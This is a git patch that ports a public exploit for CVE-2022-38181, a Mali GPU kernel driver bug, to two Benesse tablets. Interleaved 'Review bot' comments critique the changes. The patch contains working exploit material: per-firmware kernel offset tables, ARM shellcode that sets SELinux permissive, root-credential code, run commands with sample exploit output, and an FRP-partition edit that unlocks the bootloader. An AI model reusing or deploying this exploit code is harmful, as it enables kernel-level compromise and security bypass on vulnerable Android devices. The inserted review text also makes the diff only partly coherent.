From b3e89303ea9b6e4350b4734bd52599d1a4788a48 Mon Sep 17 00:00:00 2001 From: Syuugo Date: Tue, 14 May 2024 14:19:03 +0900 Subject: [PATCH] Support Neo / Next MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: yuu <46545607+mouseos@users.noreply.github.com> Signed-off-by: Syuugo Co-authored-by: yuu <46545607+mouseos@users.noreply.github.com> --- README.md | 137 +++++++-- mali_shrinker_mmap32.c | 643 ++++++++++++++++++----------------- midgard.h | 18 +- 3 files changed, 406 insertions(+), 392 deletions(-) diff --git a/README.md b/README.md index d11372a..584011e 100644 --- a/README.md +++ b/README.md 
@@ -1,32 +1,127 @@ -## Exploit for CVE-2022-38181 for FireTV 2nd gen Cube +## Exploit for CVE-2022-38181 for TAB-A05-BD(CTX) and TAB-A05-BA1(CTZ) -This is a fork of security researcher Man Yue Mo's [Pixel 6 POC](https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Mali/CVE_2022_38181) for CVE-2022-38181. Read his detailed write-up of the vulnerability [here](https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug/). Changes have been made to account for FireOS's 32bit userspace, as well as the 2nd gen Cube's older Bifrost drivers (r16p0) and Linux kernel (4.9.113) versions. The POC exploits a bug in the ARM Mali kernel driver to gain arbitrary kernel code execution, which is then used to disable SELinux and gain root. +これは、**TAB-A05-BD** 及び **TAB-A05-BA1** 専用の SELinux の状態を **`Permissive`** にするためのエクスプロイトです。 + +## 使用方法 + +> [!NOTE] +> まず、大前提として、ADB が使用可能である必要が有ります。 +> 開発者向けオプションが塞がれている場合、[**DchaStateChanger**](https://github.com/SmileTabLabo/DchaStateChanger) や [**NovaDirectInstaller**](https://github.com/s1204IT/NovaDirectInstaller) を使用してください。 -I used the following command to compile with clang in ndk-21: ``` -android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi30-clang -DSHELL mali_shrinker_mmap32.c -o raven_shrinker +adb push shrinker /data/local/tmp +adb shell chmod +x /data/local/tmp/shrinker +adb shell /data/local/tmp/shrinker ``` -The exploit should be run 30-90sec after the Cube boots for greatest reliability. + +> [!IMPORTANT] +> `shrinker` を実行して一回目で成功できるとは限りません。 +> 途中でクラッシュしたり、無効な引数があると返される場合があります。 +> 残念ながら仕様なので、根気強く何度も挑戦して下さい。 + +一番最後に **`result 49`** と返ってきたら、 ``` -raven:/ $ /data/local/tmp/raven_shrinker -fingerprint: Amazon/raven/raven:9/PS7624.3337N/0026810845440:user/amz-p,release-keys -failed, retry. -failed, retry. -failed, retry. +adb shell getenforce +``` +これを実行して、**`Permissive`** と返って来る事を確認して下さい。 +エクスプロイトの実行は成功です。 + +
TAB-A05-BD 01.11.000 での実行コード + +``` +TAB-A05-BD:/ $ /data/local/tmp/shrinker +fingerprint: benesse/TAB-A05-BD/TAB-A05-BD:9/01.11.000/01.11.000:user/release-keys failed, retry. -region freed 80 -alias gpu va 100c85000 +region freed 56 +alias gpu va 100642000 read 0 cleanup flush region release_mem_pool +reserve pages here jit_freed -jit_free commit: 2 0 -Found freed_idx 2 -Found pgd 23, 100cce000 -overwrite addr : 104100634 634 -overwrite addr : 104300634 634 -overwrite addr : 1041001c4 1c4 -overwrite addr : 1043001c4 1c4 -result 50 -raven:/ # +jit_free commit: 0 0 +Found freed_idx 0 +find_pgd, freed_idx is 0 start_pg is 0 +find_pgd, freed_idx is 0 start_pg is 0 +Found pgd 23, 100659000 +write_data overwrite addr : 1041009bc 9bc +write_data overwrite addr : 1043009bc 9bc +write_func called with code_size = 8 +write_func overwrite addr : 104100d48 d48 +write_func overwrite addr : 104300d48 d48 +time to run_enforce +run_enforce: before sleep +run_enforce: after sleep +run_enforce: open +result 48 +run_enforce_un: before sleep +run_enforce_un: after sleep +run_enforce_un: open +run_enforce_un: after read +run_enforce_un: after close +result 49 +TAB-A05-BD:/ $ getenforce +Permissive +``` +
+ +> [!TIP] +> ブートローダーアンロックは別の処理が必要となるので、次項を参照してください。 + +## ブートローダーアンロック + + +> [!IMPORTANT] +> SELinux が **`Permissive`** の状態の端末を使用してください。 + +始めに、[**DchaServiceTester**](https://github.com/s1204IT/DchaServiceTester/releases/latest) をインストールしてください。 +インストールが終わり次第、アプリを起動し、**`copyUpdateImage`** を選択して下さい。 + +「ファイルのコピー元フルパス」を **`/dev/block/by-name/ftp`** 、「ファイルのコピー先フルパス」を **`/sdcard/frp.bin`** にして実行します。 +正しく実行していれば、`true` と返ってくるはずです。 + +PC に移り、 ``` +adb pull /sdcard/frp.bin +``` +この様に実行し、`frp.bin` を抽出します。 + +抽出したら、[HexEd.it](https://hexed.it/ "HexEd.it - Browser-based Online and Offline Hex Editing") を開き、左上の「ファイルを開く」から、先程抽出した`frp.bin`を選択します。 + +**一番最後の部分**を、`00` から **`01`** に書き換え、保存します。 +[![](https://github.com/SmileTabLabo/CVE-2022-38181/assets/52069677/a7627e2f-7b33-48fd-a0e6-59d637197352)](#) + +保存出来次第、 +``` +adb push frp.bin /sdcard/frp.bin +``` +この様に実行し、端末側に送ります。 + +もう一度、**DchaServiceTester** を開き、次は コピー元 と コピー先 を逆にして実行します。 +先程と同様に、正しく実行していれば、`true` と返ってくるはずです。 + +FRP の書き換えが出来たら、 +``` +adb reboot bootloader +``` +これを実行し、fastboot モードに入ります。 + +``` +fastboot flashing unlock +``` +これを実行し、端末側で 音量+ ボタンを押します。 +5秒程度でアンロックが完了します。 + +> [!TIP] +> この時点で、修正済み `factory.img` をフラッシュする事を強くお勧めします。 + +``` +fastboot reboot +``` +これを実行し、端末を再起動したら、自動的に初期化が始まります。 + +これでブートローダーアンロックは完了です! + +## Thanks +- [@Baiker000](https://github.com/Baiker000) + diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c index 48fe5d5..ecead8e 100644 --- a/mali_shrinker_mmap32.c +++ b/mali_shrinker_mmap32.c @@ -22,9 +22,9 @@ #include #define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__) -#endif //SHELL +#endif // SHELL -#define MALI "/dev/mali0" //check, may be different on other devices +#define MALI "/dev/mali0" #define PAGE_SHIFT 12 
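Review bot: the rewritten README tells the user to `adb push shrinker /data/local/tmp`, but the only build instructions (`armv7a-linux-androideabi30-clang -DSHELL mali_shrinker_mmap32.c -o raven_shrinker`) and the credit to Man Yue Mo's Pixel 6 PoC and write-up are deleted in this hunk, so a reader of the new page cannot produce `shrinker` and never learns that `-DSHELL` is what makes LOG print to the terminal instead of logcat; restore the attribution paragraph and a build line for the new binary name. Two smaller points in the same hunk: the bootloader-unlock step copies from `/dev/block/by-name/ftp` to `/sdcard/frp.bin` and the surrounding text says FRP, so confirm the partition really is `ftp` and not a typo for `frp` (a wrong path only shows up as DchaServiceTester returning `false`); and the success criterion "`result 49`" is the decimal ASCII code of the byte read back from `/sys/fs/selinux/deny_unknown` ('1'), with `result 48` being '0' from `/sys/fs/selinux/enforce`, which deserves one sentence so users can interpret any other value they see.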
@@ -34,13 +34,13 @@ #define SPRAY_PAGES 25 -#define SPRAY_NUM 128 +#define SPRAY_NUM 64 -#define FLUSH_SIZE (0x1000 * 0x180) //increasing = less 'out of memory' results but more crashes (default 0x1000 * 0x100) +#define FLUSH_SIZE (0x1000 * 0x1000) // increasing = less 'out of memory' results but more crashes (default 0x1000 * 0x100) #define SPRAY_CPU 0 -#define POOL_SIZE 16384 //may be different on other devices +#define POOL_SIZE 16384 #define RESERVED_SIZE 32 @@ -50,7 +50,7 @@ #define NUM_TRIALS 100 -#define KERNEL_BASE 0x1080000 //raven's kernel load address +#define KERNEL_BASE 0x40080000 #define OVERWRITE_INDEX 256 
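Review bot: the FLUSH_SIZE comment is now stale: the value goes from 0x1000 * 0x180 to 0x1000 * 0x1000 (64 MiB) while the comment still says "default 0x1000 * 0x100" and warns that increasing it trades 'out of memory' results for more crashes, which is exactly the failure mode the README asks users to retry through. Say why 64 MiB and SPRAY_NUM 64 are right for these devices so the next port does not copy them blindly. In the same hunks the `//check, may be different on other devices` notes on MALI (previous hunk) and POOL_SIZE and the `raven's kernel load address` comment on KERNEL_BASE were deleted rather than updated; since the file now targets two devices, keep the caveats and say what 0x40080000 is. The later block comment gives `KERNEL_BASE = do_undefinstr - 0x1000` while the per-version comments subtract 0xffffff8008080000, and write_func only uses `(func + KERNEL_BASE) % 0x1000`, so only the low 12 bits of this constant matter; one sentence stating that would resolve the contradiction.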
@@ -62,204 +62,136 @@ #define ADD_COMMIT_INDEX 3 -//offset values from Cube kallsyms, subtract head t _head -// PS7212/1333 -#define SELINUX_ENFORCING_7212_1333 0x184d634 -#define SEL_READ_HANDLE_UNKNOWN_7212_1333 0x364304 -#define INIT_CRED_7212_1333 0x15eb228 -#define COMMIT_CREDS_7212_1333 0x4ccc0 -#define ADD_INIT_7212_1333 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7212_1333 0x91330108 //add x8, x8, #0xcc0 - -// PS7216/1582 (uncofirmed) -#define SELINUX_ENFORCING_7216_1582 0x184d634 -#define SEL_READ_HANDLE_UNKNOWN_7216_1582 0x364304 -#define INIT_CRED_7216_1582 0x15eb228 -#define COMMIT_CREDS_7216_1582 0x4ccc0 -#define ADD_INIT_7216_1582 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7216_1582 0x91330108 //add x8, x8, #0xcc0 - -// PS7224/1752 (uncofirmed) -#define SELINUX_ENFORCING_7224_1752 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7224_1752 0x3641bc -#define INIT_CRED_7224_1752 0x15fb228 -#define COMMIT_CREDS_7224_1752 0x4ccc0 -#define ADD_INIT_7224_1752 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7224_1752 0x91330108 //add x8, x8, #0xcc0 - -// PS7229/1853 -#define SELINUX_ENFORCING_7229_1853 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7229_1853 0x3641bc -#define INIT_CRED_7229_1853 0x15fb228 -#define COMMIT_CREDS_7229_1853 0x4ccc0 -#define ADD_INIT_7229_1853 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7229_1853 0x91330108 //add x8, x8, #0xcc0 - -// PS7229/1856 -#define SELINUX_ENFORCING_7229_1856 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7229_1856 0x3641bc -#define INIT_CRED_7229_1856 0x15fb228 -#define COMMIT_CREDS_7229_1856 0x4ccc0 -#define ADD_INIT_7229_1856 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7229_1856 0x91330108 //add x8, x8, #0xcc0 - -// PS7234/2039 (unconfirmed) -#define SELINUX_ENFORCING_7234_2039 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7234_2039 0x36383c -#define INIT_CRED_7234_2039 0x15fb228 -#define COMMIT_CREDS_7234_2039 0x4ccc0 -#define ADD_INIT_7234_2039 0x9108a000 //add x0, x0, #0x228 
-#define ADD_COMMIT_7234_2039 0x91330108 //add x8, x8, #0xcc0 - -// PS7234/2042 (unconfirmed) -#define SELINUX_ENFORCING_7234_2042 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7234_2042 0x36383c -#define INIT_CRED_7234_2042 0x15fb228 -#define COMMIT_CREDS_7234_2042 0x4ccc0 -#define ADD_INIT_7234_2042 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7234_2042 0x91330108 //add x8, x8, #0xcc0 - -// PS7242/2216 -#define SELINUX_ENFORCING_7242_2216 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7242_2216 0x3641ec -#define INIT_CRED_7242_2216 0x15fb228 -#define COMMIT_CREDS_7242_2216 0x4ccc0 -#define ADD_INIT_7242_2216 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7242_2216 0x91330108 //add x8, x8, #0xcc0 - -// PS7242/2896 (unconfirmed) -#define SELINUX_ENFORCING_7242_2896 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7242_2896 0x364158 -#define INIT_CRED_7242_2896 0x15fb228 -#define COMMIT_CREDS_7242_2896 0x4ccc0 -#define ADD_INIT_7242_2896 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7242_2896 0x91330108 //add x8, x8, #0xcc0 - -// PS7242/2906 -#define SELINUX_ENFORCING_7242_2906 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7242_2906 0x364158 -#define INIT_CRED_7242_2906 0x15fb228 -#define COMMIT_CREDS_7242_2906 0x4ccc0 -#define ADD_INIT_7242_2906 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7242_2906 0x91330108 //add x8, x8, #0xcc0 - -// PS7242/3515 -#define SELINUX_ENFORCING_7242_3515 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7242_3515 0x364158 -#define INIT_CRED_7242_3515 0x15fb228 -#define COMMIT_CREDS_7242_3515 0x4ccc0 -#define ADD_INIT_7242_3515 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7242_3515 0x91330108 //add x8, x8, #0xcc0 - -// PS7242/3516 -#define SELINUX_ENFORCING_7242_3516 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7242_3516 0x364158 -#define INIT_CRED_7242_3516 0x15fb228 -#define COMMIT_CREDS_7242_3516 0x4ccc0 -#define ADD_INIT_7242_3516 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7242_3516 0x91330108 //add x8, x8, #0xcc0 - 
-// PS7273/2625 -#define SELINUX_ENFORCING_7273_2625 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7273_2625 0x364158 -#define INIT_CRED_7273_2625 0x15fb528 -#define COMMIT_CREDS_7273_2625 0x4ccc0 -#define ADD_INIT_7273_2625 0x9114a000 //add x0, x0, #0x528 -#define ADD_COMMIT_7273_2625 0x91330108 //add x8, x8, #0xcc0 - -// PS7279/2766 -#define SELINUX_ENFORCING_7279_2766 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7279_2766 0x364158 -#define INIT_CRED_7279_2766 0x15fb528 -#define COMMIT_CREDS_7279_2766 0x4ccc0 -#define ADD_INIT_7279_2766 0x9114a000 //add x0, x0, #0x528 -#define ADD_COMMIT_7279_2766 0x91330108 //add x8, x8, #0xcc0 - -// PS7285/2877 -#define SELINUX_ENFORCING_7285_2877 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7285_2877 0x364158 -#define INIT_CRED_7285_2877 0x15fb528 -#define COMMIT_CREDS_7285_2877 0x4ccc0 -#define ADD_INIT_7285_2877 0x9114a000 //add x0, x0, #0x528 -#define ADD_COMMIT_7285_2877 0x91330108 //add x8, x8, #0xcc0 - -// PS7285/2880 -#define SELINUX_ENFORCING_7285_2880 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7285_2880 0x364158 -#define INIT_CRED_7285_2880 0x15fb528 -#define COMMIT_CREDS_7285_2880 0x4ccc0 -#define ADD_INIT_7285_2880 0x9114a000 //add x0, x0, #0x528 -#define ADD_COMMIT_7285_2880 0x91330108 //add x8, x8, #0xcc0 - -// PS7292/2982 -#define SELINUX_ENFORCING_7292_2982 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7292_2982 0x3641d4 -#define INIT_CRED_7292_2982 0x15fb528 -#define COMMIT_CREDS_7292_2982 0x4ccc0 -#define ADD_INIT_7292_2982 0x9114a000 //add x0, x0, #0x528 -#define ADD_COMMIT_7292_2982 0x91330108 //add x8, x8, #0xcc0 - -// PS7292/2984 -#define SELINUX_ENFORCING_7292_2984 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7292_2984 0x3641d4 -#define INIT_CRED_7292_2984 0x15fb528 -#define COMMIT_CREDS_7292_2984 0x4ccc0 -#define ADD_INIT_7292_2984 0x9114a000 //add x0, x0, #0x528 -#define ADD_COMMIT_7292_2984 0x91330108 //add x8, x8, #0xcc0 - -// PS7603/3110 -#define SELINUX_ENFORCING_7603_3110 0x185d634 -#define 
SEL_READ_HANDLE_UNKNOWN_7603_3110 0x3641d4 -#define INIT_CRED_7603_3110 0x15fb528 -#define COMMIT_CREDS_7603_3110 0x4ccc0 -#define ADD_INIT_7603_3110 0x9114a000 //add x0, x0, #0x528 -#define ADD_COMMIT_7603_3110 0x91330108 //add x8, x8, #0xcc0 - -// PS7608/3614 -#define SELINUX_ENFORCING_7608_3614 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7608_3614 0x3641d4 -#define INIT_CRED_7608_3614 0x15fb528 -#define COMMIT_CREDS_7608_3614 0x4ccc0 -#define ADD_INIT_7608_3614 0x9114a000 //add x0, x0, #0x528 -#define ADD_COMMIT_7608_3614 0x91330108 //add x8, x8, #0xcc0 - -// PS7614/3227 -#define SELINUX_ENFORCING_7614_3227 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7614_3227 0x3641c4 -#define INIT_CRED_7614_3227 0x15fb568 -#define COMMIT_CREDS_7614_3227 0x4ccb0 -#define ADD_INIT_7614_3227 0x9115a000 //add x0, x0, #0x568 -#define ADD_COMMIT_7614_3227 0x9132c108 //add x8, x8, #0xcb0 - -// PS7624/3337 -#define SELINUX_ENFORCING_7624_3337 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7624_3337 0x3641c4 -#define INIT_CRED_7624_3337 0x15fb568 -#define COMMIT_CREDS_7624_3337 0x4ccb0 -#define ADD_INIT_7624_3337 0x9115a000 //add x0, x0, #0x568 -#define ADD_COMMIT_7624_3337 0x9132c108 //add x8, x8, #0xcb0 - -// PS7633/3445 -#define SELINUX_ENFORCING_7633_3445 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7633_3445 0x3641d0 -#define INIT_CRED_7633_3445 0x15fb568 -#define COMMIT_CREDS_7633_3445 0x4ccb0 -#define ADD_INIT_7633_3445 0x9115a000 //add x0, x0, #0x568 -#define ADD_COMMIT_7633_3445 0x9132c108 //add x8, x8, #0xcb0 - - -static uint64_t sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7624_3337; - -static uint64_t selinux_enforcing = SELINUX_ENFORCING_7624_3337; /* -Overwriting SELinux to permissive +KERNEL_BASE = do_undefinstr - 0x1000 +COMMIT_CREDS = commit_creds - KERNEL_BASE +AVC_DENY= avc_denied.isra.4 - KERNEL_BASE +SEL_READ_ENFORCE = sel_read_enforce - KERNEL_BASE +SEL_READ_HANDLE_UNKNOWN = sel_read_handle_unknown - KERNEL_BASE + +Need: Ghidra +Search: prepare_kernel_cred -> 
+INIT_CRED = mov - KERNEL_BASE +Search: sel_read_enforce -> +SELINUX_ENFORCING = ldr - KERNEL_BASE + +Need: ARM to HEX +ADD_COMMIT = add x8, x8, #0x(Last 3 digits of INIT_CRED) +ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED) +*/ + +// TAB-A05-BD 01.00.000 +#define SELINUX_ENFORCING_CTX_01_00_000 0x129d9bc +#define SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000 0x365d80 // 0xffffff80083e5d80 - 0xffffff8008080000 = 0x365d80 +#define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8 // 0xffffff80083e53a8 - 0xffffff8008080000 = 0x3653A8 //add +#define INIT_CRED_CTX_01_00_000 0x11553f0 // 0xffffff80091d53f0 - 0xffffff8008080000 = 0x11553F0 +#define COMMIT_CREDS_CTX_01_00_000 0x5a120 // 0xffffff80080da120 - 0xffffff8008080000 = 0x5a120 +#define ADD_INIT_CTX_01_00_000 0x910fc000 +#define ADD_COMMIT_CTX_01_00_000 0x91048108 +#define AVC_DENY_CTX_01_00_000 0x35acc8 // 0xffffff80083dacc8 - 0xffffff8008080000 = 0x35ACC8;//add + +/* + * Maintained by Syuugo + */ + +// TAB-A05-BD 01.01.001 +#define COMMIT_CREDS_CTX_01_01_001 0x5a120 +#define AVC_DENY_CTX_01_01_001 0x35acc8 +#define SEL_READ_ENFORCE_CTX_01_01_001 0x365418 +#define SEL_READ_HANDLE_UNKNOWN_CTX_01_01_001 0x365df0 +#define INIT_CRED_CTX_01_01_001 0x11653f0 +#define SELINUX_ENFORCING_CTX_01_01_001 0x12ad9bc +#define ADD_INIT_CTX_01_01_001 0x910fc000 +#define ADD_COMMIT_CTX_01_01_001 0x91048108 + +// TAB-A05-BD 01.04.000 +#define COMMIT_CREDS_CTX_01_04_000 0x5a120 +#define AVC_DENY_CTX_01_04_000 0x35ac10 +#define SEL_READ_ENFORCE_CTX_01_04_000 0x365360 +#define SEL_READ_HANDLE_UNKNOWN_CTX_01_04_000 0x365d38 +#define INIT_CRED_CTX_01_04_000 0x11653f0 +#define SELINUX_ENFORCING_CTX_01_04_000 0x12ae9bc +#define ADD_INIT_CTX_01_04_000 0x910fc000 +#define ADD_COMMIT_CTX_01_04_000 0x91048108 + +// TAB-A05-BD 01.11.000 +#define COMMIT_CREDS_CTX_01_11_000 0x5a120 +#define AVC_DENY_CTX_01_11_000 0x359c20 +#define SEL_READ_ENFORCE_CTX_01_11_000 0x364370 +#define SEL_READ_HANDLE_UNKNOWN_CTX_01_11_000 0x364d48 +#define 
INIT_CRED_CTX_01_11_000 0x11653f0 +#define SELINUX_ENFORCING_CTX_01_11_000 0x12ae9bc +#define ADD_INIT_CTX_01_11_000 0x910fc000 +#define ADD_COMMIT_CTX_01_11_000 0x91048108 + +// TAB-A05-BA1 01.00.000 +#define COMMIT_CREDS_CTZ_01_00_000 0x5a120 +#define AVC_DENY_CTZ_01_00_000 0x359c20 +#define SEL_READ_ENFORCE_CTZ_01_00_000 0x364370 +#define SEL_READ_HANDLE_UNKNOWN_CTZ_01_00_000 0x364d48 +#define INIT_CRED_CTZ_01_00_000 0x11653f0 +#define SELINUX_ENFORCING_CTZ_01_00_000 0x12d49bc +#define ADD_INIT_CTZ_01_00_000 0x910fc000 +#define ADD_COMMIT_CTZ_01_00_000 0x91048108 + +// TAB-A05-BA1 01.01.000 +#define COMMIT_CREDS_CTZ_01_01_000 0x5a120 +#define AVC_DENY_CTZ_01_01_000 0x359a68 +#define SEL_READ_ENFORCE_CTZ_01_01_000 0x3641b8 +#define SEL_READ_HANDLE_UNKNOWN_CTZ_01_01_000 0x364b90 +#define INIT_CRED_CTZ_01_01_000 0x11653f0 +#define SELINUX_ENFORCING_CTZ_01_01_000 0x12d49bc +#define ADD_INIT_CTZ_01_01_000 0x910fc000 +#define ADD_COMMIT_CTZ_01_01_000 0x91048108 + +// TAB-A05-BA1 01.02.004 +#define COMMIT_CREDS_CTZ_01_02_004 0x5a120 +#define AVC_DENY_CTZ_01_02_004 0x35bad0 +#define SEL_READ_ENFORCE_CTZ_01_02_004 0x366190 +#define SEL_READ_HANDLE_UNKNOWN_CTZ_01_02_004 0x366b68 +#define INIT_CRED_CTZ_01_02_004 0x11a53f0 +#define SELINUX_ENFORCING_CTZ_01_02_004 0x13199bc +#define ADD_INIT_CTZ_01_02_004 0x910fc000 +#define ADD_COMMIT_CTZ_01_02_004 0x91048108 + +// TAB-A05-BA1 01.02.005 +#define COMMIT_CREDS_CTZ_01_02_005 0x5a120 +#define AVC_DENY_CTZ_01_02_005 0x35bad0 +#define SEL_READ_ENFORCE_CTZ_01_02_005 0x366190 +#define SEL_READ_HANDLE_UNKNOWN_CTZ_01_02_005 0x366b68 +#define INIT_CRED_CTZ_01_02_005 0x11a53f0 +#define SELINUX_ENFORCING_CTZ_01_02_005 0x13199bc +#define ADD_INIT_CTZ_01_02_005 0x910fc000 +#define ADD_COMMIT_CTZ_01_02_005 0x91048108 + +// TAB-A05-BA1 01.03.000 +#define COMMIT_CREDS_CTZ_01_03_000 0x5a120 +#define AVC_DENY_CTZ_01_03_000 0x35bad0 +#define SEL_READ_ENFORCE_CTZ_01_03_000 0x366190 +#define SEL_READ_HANDLE_UNKNOWN_CTZ_01_03_000 0x366b68 +#define 
INIT_CRED_CTZ_01_03_000 0x11a53f0 +#define SELINUX_ENFORCING_CTZ_01_03_000 0x13199bc +#define ADD_INIT_CTZ_01_03_000 0x910fc000 +#define ADD_COMMIT_CTZ_01_03_000 0x91048108 + +static uint64_t sel_read_handle_unknown; + +static uint64_t selinux_enforcing; + +//static uint64_t avc_deny = 0x2CCC28; +static uint64_t avc_deny; +static uint64_t selinux_enforcing_READ = 0X0; +static uint64_t selinux_enforcing_WRITE = 0X0; +/* + Overwriting SELinux to permissive strb wzr, [x0] mov x0, #0 ret */ -//static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; +static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; static uint32_t root_code[8] = {0}; +static uint32_t root_code_un[8] = {0}; static uint8_t jit_id = 1; static uint8_t atom_number = 1; @@ -272,15 +204,15 @@ static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE]; struct base_mem_handle { - struct { - __u64 handle; - } basep; + struct { + __u64 handle; + } basep; }; struct base_mem_aliasing_info { - struct base_mem_handle handle; - __u64 offset; - __u64 length; + struct base_mem_handle handle; + __u64 offset; + __u64 length; }; static int open_dev(char* name) { @@ -296,7 +228,7 @@ void setup_mali(int fd, int group_id) { if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, ¶m) < 0) { err(1, "version check failed\n"); } - //struct kbase_ioctl_set_flags set_flags = {group_id << 3}; + // struct kbase_ioctl_set_flags set_flags = {group_id << 3}; struct kbase_ioctl_set_flags set_flags = {0}; if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) { err(1, "set flags failed\n"); @@ -347,7 +279,7 @@ uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { err(1, "submit job failed\n"); } - return *((uint64_t*)gpu_alloc_region); + return *((uint64_t*)gpu_alloc_region); } void jit_free(int fd, uint8_t atom_number, uint8_t id) { 
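Review bot: the derivation comment at the top of the new offset table is wrong for ADD_COMMIT: it says `add x8, x8, #0x(Last 3 digits of INIT_CRED)`, but the value used, 0x91048108, encodes `add x8, x8, #0x120`, i.e. the low 12 bits of COMMIT_CREDS (0x5a120), while 0x910fc000 encodes `add x0, x0, #0x3f0` from INIT_CRED (0x11553f0). Fix the comment to say COMMIT_CREDS, or better, compute both instructions at runtime as `0x91000000 | ((addr & 0xfff) << 10) | (reg << 5) | reg` and drop the hand-assembled ADD_INIT_* / ADD_COMMIT_* constants from every entry, which removes one copy-paste hazard per firmware version. Further in the hunk: AVC_DENY_*, SEL_READ_ENFORCE_*, `avc_deny`, `selinux_enforcing_READ` and `selinux_enforcing_WRITE` (written `0X0`) are defined but never read anywhere in this patch, and the `//add` trailers on two of the 01.00.000 lines look like leftover working notes. The static defaults for `sel_read_handle_unknown` and `selinux_enforcing` were removed too; check that select_offset fails hard on an unknown fingerprint, because with these now zero-initialised a miss would aim the writes at page offset 0 instead of the old 7624_3337 fallback. The whitespace-only reindentation of base_mem_handle / base_mem_aliasing_info and the `//`→`// ` comment-spacing changes would be easier to review as a separate commit.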
@@ -507,7 +439,7 @@ void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) { alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; // | (1 << 22); int prot = PROT_READ | PROT_WRITE; alloc.in.va_pages = pages; - alloc.in.commit_pages = pages; //alloc.in.commit_pages = 0; + alloc.in.commit_pages = pages; // alloc.in.commit_pages = 0; mem_alloc(mali_fd, &alloc); reserved_va[i] = alloc.out.gpu_va; } @@ -536,7 +468,7 @@ uint64_t alias_sprayed_regions(int mali_fd) { printf("alias gpu va %llx\n", alias.out.gpu_va); /* uint64_t region_size = 0x1000 * SPRAY_NUM * SPRAY_PAGES; - void* region = mmap64(NULL, region_size, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va); + void* region = mmap(NULL, region_size, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va); if (region == MAP_FAILED) { err(1, "mmap alias failed"); } @@ -549,7 +481,7 @@ uint64_t alias_sprayed_regions(int mali_fd) { } alias_regions[i] = this_region; } - // return (uint64_t)(alias_regions[0]); + //return (uint64_t)(alias_regions[0]); return (uint64_t)alias.out.gpu_va; } @@ -580,7 +512,9 @@ int find_freed_idx(int mali_fd) { } int find_pgd(int freed_idx, int start_pg) { + printf("find_pgd, freed_idx is %d start_pg is %d \n",freed_idx, start_pg); uint64_t* this_alias = alias_regions[freed_idx]; + printf("find_pgd, freed_idx is %d start_pg is %d \n",freed_idx, start_pg); for (int pg = start_pg; pg < SPRAY_PAGES; pg++) { for (int i = 0; i < 0x1000/8; i++) { uint64_t entry = this_alias[pg * 0x1000/8 + i]; 
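Review bot: find_pgd now prints the identical `find_pgd, freed_idx is %d start_pg is %d` line twice in a row (before and after the `this_alias` assignment), which is why the README log shows it duplicated; keep one, and since it is a debug trace, route it through LOG like the rest of the file so it is not lost when the binary is built without -DSHELL. The `mmap64`→`mmap` change in alias_sprayed_regions is inside a commented-out block and has no effect, and `// return` → `//return` reverses the comment-spacing style this same patch applies everywhere else.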
